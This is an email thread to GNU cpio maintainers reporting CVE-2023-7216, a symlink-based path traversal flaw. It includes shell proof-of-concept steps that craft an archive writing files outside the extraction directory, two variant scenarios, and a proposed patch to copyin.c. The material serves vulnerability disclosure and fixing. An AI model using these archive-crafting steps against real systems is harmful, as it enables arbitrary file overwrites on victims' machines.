Dear cpio maintainer: This is a Red Hat Community Report on CVE-2023-7216:https://bugzilla.redhat.com/show_bug.cgi?id=2249901 CVE-2023-7216 can cause path traversal when opening a cpio archive, which can lead to malicious file overwrites of arbitrary directories. Redhat CVE-2023-7216's Poc can be reproduced using the following method: ``` [root@localhost home]# mkdir testcpio [root@localhost home]# ln -sf /tmp/ testcpio/tmp [root@localhost home]# echo "TEST Traversal" > testcpio/tmpYtrav.txt [root@localhost home]# cd testcpio/ [root@localhost testcpio]# ls | cpio -ov > ../trav.cpio tmp tmpYtrav.txt 1 block [root@localhost testcpio]# cd .. [root@localhost home]# sed -i s/"tmpY"/"tmp\/"/g trav.cpio [root@localhost home]# cpio -i < trav.cpio [root@localhost home]# cat /tmp/trav.txt TEST Traversal [root@localhost home]# cat tmp/trav.txt TEST Traversal ``` Based on my understanding of the POC and analysis of CVE-2023-7216, I constructed two more POC scenarios.
The POC1 can be reproduced using the following methods: Machine A can use the tampered trav.cpio file to overwrite any file on machine B, which may lead to remote command execution. ``` Machine A [root@localhostA home]# mkdir testcpio [root@localhostA home]# ln -sf /tmp/ testcpio/tmp [root@localhostA home]# echo "TEST Traversal" > testcpio/tmpYtrav.txt [root@localhostA home]# cd testcpio/ [root@localhostA testcpio]# ls | cpio -ov > ../trav.cpio tmp tmpYtrav.txt 1 block [root@localhost testcpio]# cd .. [root@localhost home]# sed -i s/"tmpY"/"tmp\/"/g trav.cpio ``` Assume that machine A transfers files to machine B through scp or other file transfer methods. CVE-2023-7216 is triggered when Machine B opens trav.cpio ```Machine B [root@localhostB home]# cpio -i < trav.cpio [root@localhostB home]# cat /tmp/trav.txt TEST Traversal [root@localhostB home]# cat tmp/trav.txt TEST Traversal ``` Impact of POC1: This indicates that any cpio archive file that contains symlinks may cause security risks such as path traversal. The POC2 can be reproduced using the following methods: ``` [root@localhost home]# mkdir testcpio [root@localhost home]# ln -sf /tmp/ testcpio/tmp [root@localhost home]# echo "TEST Traversal" > testcpio/tmpYtrav.txt [root@localhost home]# cd testcpio/ [root@localhost testcpio]# ls | cpio -ov > ../trav.cpio tmp tmpYtrav.txt 1 block [root@localhost testcpio]# cd .. [root@localhost home]# mkdir dirA [root@localhost home]# sed -i s/"tmpY"/"tmp\/"/g trav.cpio [root@localhost home]# cpio -i < trav.cpio -D /home/dirA [root@localhost home]# cat /tmp/trav.txt TEST Traversal [root@localhost home]# cat dirA/tmp/trav.txt TEST Traversal ``` Impact of POC2: When the -D option is used, the cpio file is expected to be decompressed in the specified directory. However, due to the impact of CVE-2023-7216, the file is also generated in the symlink directory, which is not as expected.Like CVE-2015-1197. When the --no-absolute-filenames option is used, the decompressed file should be generated in the current directory instead of the symlink directory. First of all, I would like to discuss an issue with you, that is, when fixing CVE-2015-1197, the copy_link () function generates symlinks directly through the symlink () function if the --no-absolute-filenames option is not used when processing symlinks. This means that in this case, cpio allows writing files in arbitrary directories through symlinks. Is this what cpio was designed for? I believe this design is the root cause of CVE-2023-7216. If you think this is a reasonable design, please let me know your reasons and provide a solution for CVE-2023-7216. If you agree with me that cpio should not allow writing files in arbitrary directories through symlinks,then we can discuss my solution. In my views, I don't think we can guarantee that the cpio archive does not contain any symlinks. We must handle each symlink as the same as the fix for CVE-2015-1197 during decompression. So I made a patch. I have attached the patch in the mail. If you have a better fix, please let me know. Look forward to your feedback and suggestions soon. Best Regards, Peng From 9cf2f601f9beec06b0e7b4fcf3f454195bff1b77 Mon Sep 17 00:00:00 2001 From: Peng <[email protected]> Date: Thu, 29 Feb 2024 17:22:11 +0800 Subject: [PATCH] deafult use symlink_placeholder() to fix Path Traversal --- src/copyin.c | 26 +------------------------- 1 file changed, 1 insertion(+), 25 deletions(-) diff --git a/src/copyin.c b/src/copyin.c index ace0a02..c454313 100644 --- a/src/copyin.c +++ b/src/copyin.c @@ -789,31 +789,7 @@ copyin_link (struct cpio_file_stat *file_hdr, int in_file_des) link_name = xstrdup (file_hdr->c_tar_linkname); } - if (no_abs_paths_flag) - symlink_placeholder (link_name, file_hdr->c_name, file_hdr); - else - { - res = UMASKED_SYMLINK (link_name, file_hdr->c_name, - file_hdr->c_mode); - if (res < 0 && create_dir_flag) - { - create_all_directories (file_hdr->c_name); - res = UMASKED_SYMLINK (link_name, file_hdr->c_name, file_hdr->c_mode); - } - if (res < 0) - symlink_error (link_name, file_hdr->c_name); - else if (!no_chown_flag) - { - uid_t uid = set_owner_flag ? set_owner : file_hdr->c_uid; - gid_t gid = set_group_flag ? set_group : file_hdr->c_gid; - if (lchown (file_hdr->c_name, uid, gid) < 0 && errno != EPERM) - chown_error_details (file_hdr->c_name, uid, gid); - } - - if (retain_time_flag) - set_file_times (-1, file_hdr->c_name, file_hdr->c_mtime, - file_hdr->c_mtime, AT_SYMLINK_NOFOLLOW); - } + symlink_placeholder (link_name, file_hdr->c_name, file_hdr); free (link_name); } -- 2.33.0 ------------------ Original ------------------ From: "Peng" <[email protected]>; Date: Thu, Feb 29, 2024 07:02 PM To: "bug-cpio"<[email protected]>;"ntait"<[email protected]>;"gray"<[email protected]>;"mrehak"<[email protected]>; Subject: Re:Is there a fix for this CVE-2023-7216? Dear cpio maintainer: This is a Red Hat Community Report on CVE-2023-7216:https://bugzilla.redhat.com/show_bug.cgi?id=2249901 CVE-2023-7216 can cause path traversal when opening a cpio archive, which can lead to malicious file overwrites of arbitrary directories. Redhat CVE-2023-7216's Poc can be reproduced using the following method: ``` [root@localhost home]# mkdir testcpio [root@localhost home]# ln -sf /tmp/ testcpio/tmp [root@localhost home]# echo "TEST Traversal" > testcpio/tmpYtrav.txt [root@localhost home]# cd testcpio/ [root@localhost testcpio]# ls | cpio -ov > ../trav.cpio tmp tmpYtrav.txt 1 block [root@localhost testcpio]# cd .. [root@localhost home]# sed -i s/"tmpY"/"tmp\/"/g trav.cpio [root@localhost home]# cpio -i < trav.cpio [root@localhost home]# cat /tmp/trav.txt TEST Traversal [root@localhost home]# cat tmp/trav.txt TEST Traversal ``` First of all, I would like to confirm with you, do you accept CVE-2023-7216? Is CVE-2023-7216 a bug or is it the default behavior of cpio software? If CVE-2023-7216 is a bug, I try to provide a fix patch. Of course, if there is a better fix, please point it out. CVE-2023-7216 is similar to CVE-2015-1197,Both of them use symlink to cause Path Traversal.The CVE-2015-1197 fix uses symlink_placeholder () to fix a Path Traversal issue in the --no-absolute-filenames scenario.However, CVE-2023-7216 proves that path traversal also exists in other scenarios. So I made a patch to fix CVE-2023-7216, copyin_link() should enable symlink_placeholder() by default, not only when the --no-absolute-filenames option is on. Look forward to your feedback and suggestions soon. Best Regards, Peng ------------------ Original ------------------ From: "2773414454" <[email protected]>; Date: Tue, Feb 20, 2024 11:03 AM To: "bug-cpio"<[email protected]>; Subject: Is there a fix for this CVE-2023-7216? Dear cpio maintainer: https://nvd.nist.gov/vuln/detail/CVE-2023-7216 NVD does not provide any related patch information. Is there a fix for cpio's CVE-2023-7216? [1] If not, what is the repair plan for cpio? [2] If yes, can you indicate which submissions fix CVE-2023-7216? peng
0001-deafult-use-symlink_placeholder-to-fix-Path-Traversa.patch.txt
Description: Binary data
